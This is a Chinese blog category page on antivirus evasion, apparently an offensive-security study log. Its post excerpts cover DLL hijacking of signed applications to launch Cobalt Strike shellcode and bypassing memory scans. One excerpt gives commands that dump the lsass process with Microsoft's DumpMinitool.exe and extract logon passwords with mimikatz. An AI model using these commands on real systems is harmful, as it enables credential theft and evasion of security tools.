免杀
学习记录
evilxpl
这个作者很懒,什么都没留下…
展开
-
cdb.exe的利用
cdb.exe的利用原创 2022-12-27 15:30:58 · 1010 阅读 · 1 评论 -
github免杀项目stager.dll测试
github免杀项目stager.dll测试原创 2022-11-20 14:13:25 · 319 阅读 · 1 评论 -
免杀-绕过内存扫描
免杀-绕过内存扫描原创 2022-11-16 22:22:37 · 1403 阅读 · 0 评论 -
DLL劫持-白加黑
0x01 前言DLL劫持可以用作权限维持,权限提升等作用,下面介绍一下在有杀毒软件的情况下dll劫持通过白加黑的方式获取权限,上线目标。杀软在检测一个应用是否为病毒的时候,首先会通过黑白名单校验-病毒特征库查询-上传云查杀,在黑白名单校验阶段,如果是白名单中的应用则可以成功运行,白名单也就是有数字签名的应用,我们可以通过修改有数字签名应用中的dll,当该应用启动时会调用该dll,从而上线目标。0x02 复现使用cs生成shellcode使用管理员权限打开Aheadlib+ 选择要劫持转发的dl原创 2022-05-06 22:59:25 · 2799 阅读 · 1 评论 -
微软自带签名exe,免杀dump hash
微软签名DumpMinitool.exe,免杀dump hash微软签名的exedump lsass进程DumpMinitool.exe --file 1.txt --processId 948 --dumpType Full--file 保存文件名为1.txt 规避一下杀软--processId lsass.exe 进程号杀软无拦截查看1.dmpsekurlsa::minidump "1.dmp"sekurlsa::logonpasswords参考文章:https://原创 2022-04-16 12:09:27 · 1255 阅读 · 1 评论